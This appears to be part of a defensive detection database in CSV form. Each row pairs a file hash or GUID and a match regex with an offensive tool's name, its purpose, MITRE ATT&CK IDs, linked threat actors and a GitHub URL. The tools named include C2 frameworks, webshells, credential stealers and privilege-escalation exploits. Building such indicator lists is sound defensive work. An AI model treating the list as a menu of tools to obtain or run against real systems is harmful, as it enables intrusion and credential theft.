"*691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e*",".{0,1000}691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","28271"
"*692110b2f60de3d52ac15e84be38fab5f9a16249b2bb0011af047b174efceeda*",".{0,1000}692110b2f60de3d52ac15e84be38fab5f9a16249b2bb0011af047b174efceeda.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","#filehash","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","28272"
"*6922df4a3bd7d41b985342abc5ee2ee292912d993d6adfebfa8acd04cddcea58*",".{0,1000}6922df4a3bd7d41b985342abc5ee2ee292912d993d6adfebfa8acd04cddcea58.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28273"
"*6936c267e3cbb3bb7f418e26594bbf7367b7d2c8de6ad5d0e88c2cb3485dfcd9*",".{0,1000}6936c267e3cbb3bb7f418e26594bbf7367b7d2c8de6ad5d0e88c2cb3485dfcd9.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28279"
"*6938eff2dc2ec73ed1fa0c5b70827ecf2ea031a8486eda7f7f72ad3da4576b25*",".{0,1000}6938eff2dc2ec73ed1fa0c5b70827ecf2ea031a8486eda7f7f72ad3da4576b25.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","28280"
"*694d48564fd66f3c0647a5602f36d2e92cf6ed1291b413232816811e57b37320*",".{0,1000}694d48564fd66f3c0647a5602f36d2e92cf6ed1291b413232816811e57b37320.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28281"
"*694eb99d38f28ec564d480cdd05e3b6e703b2c0d592276322e7a74602145a5c1*",".{0,1000}694eb99d38f28ec564d480cdd05e3b6e703b2c0d592276322e7a74602145a5c1.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28283"
"*694f8c09de24e9b4b6b438020fea1d56c9941e9a2036d43dee282749a90989be*",".{0,1000}694f8c09de24e9b4b6b438020fea1d56c9941e9a2036d43dee282749a90989be.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28284"
"*6952343cc4614857f83dbb81247871e7*",".{0,1000}6952343cc4614857f83dbb81247871e7.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","28285"
"*695d04c8162644e98cb0e68926b1cc9f47398e0ddd86255453c26b7619c88f10*",".{0,1000}695d04c8162644e98cb0e68926b1cc9f47398e0ddd86255453c26b7619c88f10.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","#filehash","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","28289"
"*6964922451227f135e3fce39838f13ba80c0a53e32cd2b66132fb406e1e68411*",".{0,1000}6964922451227f135e3fce39838f13ba80c0a53e32cd2b66132fb406e1e68411.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28290"
"*696f4e32bb16f60bee96bab7207e393b554bd64795e2be9ce857845c5b886886*",".{0,1000}696f4e32bb16f60bee96bab7207e393b554bd64795e2be9ce857845c5b886886.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28291"
"*69720fc90a8dca0c2ff3f33a59042ae0a6ddedd64d5fafefbc43583aa770e175*",".{0,1000}69720fc90a8dca0c2ff3f33a59042ae0a6ddedd64d5fafefbc43583aa770e175.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","28294"
"*697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306*",".{0,1000}697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28295"
"*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*",".{0,1000}6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","28296"
"*6975b175e41c894651afbb12b63a2254a405875733c348c204ca96b2fb81790d*",".{0,1000}6975b175e41c894651afbb12b63a2254a405875733c348c204ca96b2fb81790d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28297"
"*69832c96ae4e5d3e7c006a6dd6a86322875f834306c9ef31363f0620a714ac80*",".{0,1000}69832c96ae4e5d3e7c006a6dd6a86322875f834306c9ef31363f0620a714ac80.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28298"
"*6985cca5e98eaddf1cde30a918ebfa8ebd6be892df518232b3a0b63e29043df2*",".{0,1000}6985cca5e98eaddf1cde30a918ebfa8ebd6be892df518232b3a0b63e29043df2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28300"
"*698fc52837dab69301c96949a3514845f16a6b3c2a8faf14b08ce80c4c575f2e*",".{0,1000}698fc52837dab69301c96949a3514845f16a6b3c2a8faf14b08ce80c4c575f2e.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28303"
"*69927f9215cf2d0717141e91851febb1c045715a11ebf9f55bc4181114625d41*",".{0,1000}69927f9215cf2d0717141e91851febb1c045715a11ebf9f55bc4181114625d41.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28305"
"*69964da9297a1caaa4ba0c389d4ba8a97f14d9a58cdb1cb549525ffa9684529c*",".{0,1000}69964da9297a1caaa4ba0c389d4ba8a97f14d9a58cdb1cb549525ffa9684529c.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","28306"
"*6997588d3c194d5a1d3c32ae3e2fe1475374dfe0c5845485d550796440621bbb*",".{0,1000}6997588d3c194d5a1d3c32ae3e2fe1475374dfe0c5845485d550796440621bbb.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","28307"
"*6997ce0fe65943279981c444857b406b20ebe1736442c6f4c75dae0dbd7c9549*",".{0,1000}6997ce0fe65943279981c444857b406b20ebe1736442c6f4c75dae0dbd7c9549.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28308"
"*69a200568ae92a6eee56c9fcc170b088432871fb058c29459e7bf112a58d722f*",".{0,1000}69a200568ae92a6eee56c9fcc170b088432871fb058c29459e7bf112a58d722f.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#filehash","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","28312"
"*69ab4c2375c28b0520090c3ce7c3f033d5429aee8a0ef2f7b5f54edee2a759b7*",".{0,1000}69ab4c2375c28b0520090c3ce7c3f033d5429aee8a0ef2f7b5f54edee2a759b7.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","28313"
"*69ace7287faa4854605ab46018d92332ba0d16ff926ebf17330359a4dbd7d693*",".{0,1000}69ace7287faa4854605ab46018d92332ba0d16ff926ebf17330359a4dbd7d693.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","28314"
"*69ad04521e133db1e34347ec9a6ecb8ea3f90272c77ce2471c3145ac33fad13b*",".{0,1000}69ad04521e133db1e34347ec9a6ecb8ea3f90272c77ce2471c3145ac33fad13b.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#filehash","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","28315"
"*69b9d25a8fa177bb4e35424dd0587162177938be90f50a41377f57356fe1a57d*",".{0,1000}69b9d25a8fa177bb4e35424dd0587162177938be90f50a41377f57356fe1a57d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28317"
"*69c4271ef4f5bfe68fcd696c95af04c90f3340e5af9454294d9db58410f45ea6*",".{0,1000}69c4271ef4f5bfe68fcd696c95af04c90f3340e5af9454294d9db58410f45ea6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28321"
"*69c8a35eb8a77c290766b74582cf485ffc73d81045f82df9805d4cd1c4934dfc*",".{0,1000}69c8a35eb8a77c290766b74582cf485ffc73d81045f82df9805d4cd1c4934dfc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28322"
"*69d26456753b5aad2c91b4a6a5449a66f24554d51e777fe79d5db45c58345887*",".{0,1000}69d26456753b5aad2c91b4a6a5449a66f24554d51e777fe79d5db45c58345887.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28324"
"*69d9dc8b265c039ff9a5677cbe5300fce13f17810d2dcc69a3705962adcb5015*",".{0,1000}69d9dc8b265c039ff9a5677cbe5300fce13f17810d2dcc69a3705962adcb5015.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28326"
"*69e041111e26111f406a95d9b91b5004f60ba367a0c90ffe34146e064513e56b*",".{0,1000}69e041111e26111f406a95d9b91b5004f60ba367a0c90ffe34146e064513e56b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","28327"
"*69e1d22a36d6171f98da2f56fa5261813b99549f1cab882dd13c62b4abc40043*",".{0,1000}69e1d22a36d6171f98da2f56fa5261813b99549f1cab882dd13c62b4abc40043.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28328"
"*69e92737993cca7f4757a5a3dc027b1f85ee6d836f18f6433332d9d269b9262f*",".{0,1000}69e92737993cca7f4757a5a3dc027b1f85ee6d836f18f6433332d9d269b9262f.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#filehash","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","28329"
"*69ee333eaf49be76d5bde1d3abfbd2e9a006a316284394e92aa71db1970d927d*",".{0,1000}69ee333eaf49be76d5bde1d3abfbd2e9a006a316284394e92aa71db1970d927d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28331"
"*69fae7c67545c79f70861ea4ec8b7244b555fd1898f6966e0698e1d4d4446081*",".{0,1000}69fae7c67545c79f70861ea4ec8b7244b555fd1898f6966e0698e1d4d4446081.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28332"
"*69ff7f809ee0a683102bc50c9c7dc6b619945c0d5c774c577b52879f65ae9dc9*",".{0,1000}69ff7f809ee0a683102bc50c9c7dc6b619945c0d5c774c577b52879f65ae9dc9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28334"
"*6a0271fa021d2854ea36531869d30a75d6ee7ff31a521e22e9b382ef1c545882*",".{0,1000}6a0271fa021d2854ea36531869d30a75d6ee7ff31a521e22e9b382ef1c545882.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28335"
"*6a0272c76fcec8ccada97a39b4d316eb9067b1dce499d297da7d9d02ab290c0a*",".{0,1000}6a0272c76fcec8ccada97a39b4d316eb9067b1dce499d297da7d9d02ab290c0a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28336"
"*6a0b2e5491caa977cc4efcea1a90b67480126b0d3148d1436add939bfbe785d5*",".{0,1000}6a0b2e5491caa977cc4efcea1a90b67480126b0d3148d1436add939bfbe785d5.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28338"
"*6a14782fd71e08ded40b8652783cb49695b09e4abbaaf8c22cc22d582032191f*",".{0,1000}6a14782fd71e08ded40b8652783cb49695b09e4abbaaf8c22cc22d582032191f.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","#filehash","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","28339"
"*6a1d85188bb481088fdd202dbb994910de83b05a2b49420faf1dc4a66143918b*",".{0,1000}6a1d85188bb481088fdd202dbb994910de83b05a2b49420faf1dc4a66143918b.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","28342"
"*6a1d90427fe92c1dae2ac16d5b0e7f6b2c823a1447cdad213cdb987390329b26*",".{0,1000}6a1d90427fe92c1dae2ac16d5b0e7f6b2c823a1447cdad213cdb987390329b26.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28343"
"*6a21863080045ef349eb105aa7e595c2a747b7c42e42756639b4591fea5058d6*",".{0,1000}6a21863080045ef349eb105aa7e595c2a747b7c42e42756639b4591fea5058d6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28344"
"*6a21863080045ef349eb105aa7e595c2a747b7c42e42756639b4591fea5058d6*",".{0,1000}6a21863080045ef349eb105aa7e595c2a747b7c42e42756639b4591fea5058d6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28345"
"*6a27858aee472da9a5faf7649801103ea6c0cad8d2b44baec2bffc563a0f7375*",".{0,1000}6a27858aee472da9a5faf7649801103ea6c0cad8d2b44baec2bffc563a0f7375.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28347"
"*6A2BA6F7-3399-4890-9453-2D5BE8EEBBA9*",".{0,1000}6A2BA6F7\-3399\-4890\-9453\-2D5BE8EEBBA9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","28348"
"*6a2c34b319067eea1310e221cff99ce5150be0a82a822fb280554974f6d60dd2*",".{0,1000}6a2c34b319067eea1310e221cff99ce5150be0a82a822fb280554974f6d60dd2.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","28349"
"*6a31601415f4b02531aa031b1f246cec9f652f62927bc9b3c4443aac9c2ff625*",".{0,1000}6a31601415f4b02531aa031b1f246cec9f652f62927bc9b3c4443aac9c2ff625.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#filehash","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","28350"
"*6a39044b1dc482bfb03eca45d9c4b9874fb538a13f52c90a2ed64f91152d466c*",".{0,1000}6a39044b1dc482bfb03eca45d9c4b9874fb538a13f52c90a2ed64f91152d466c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28351"
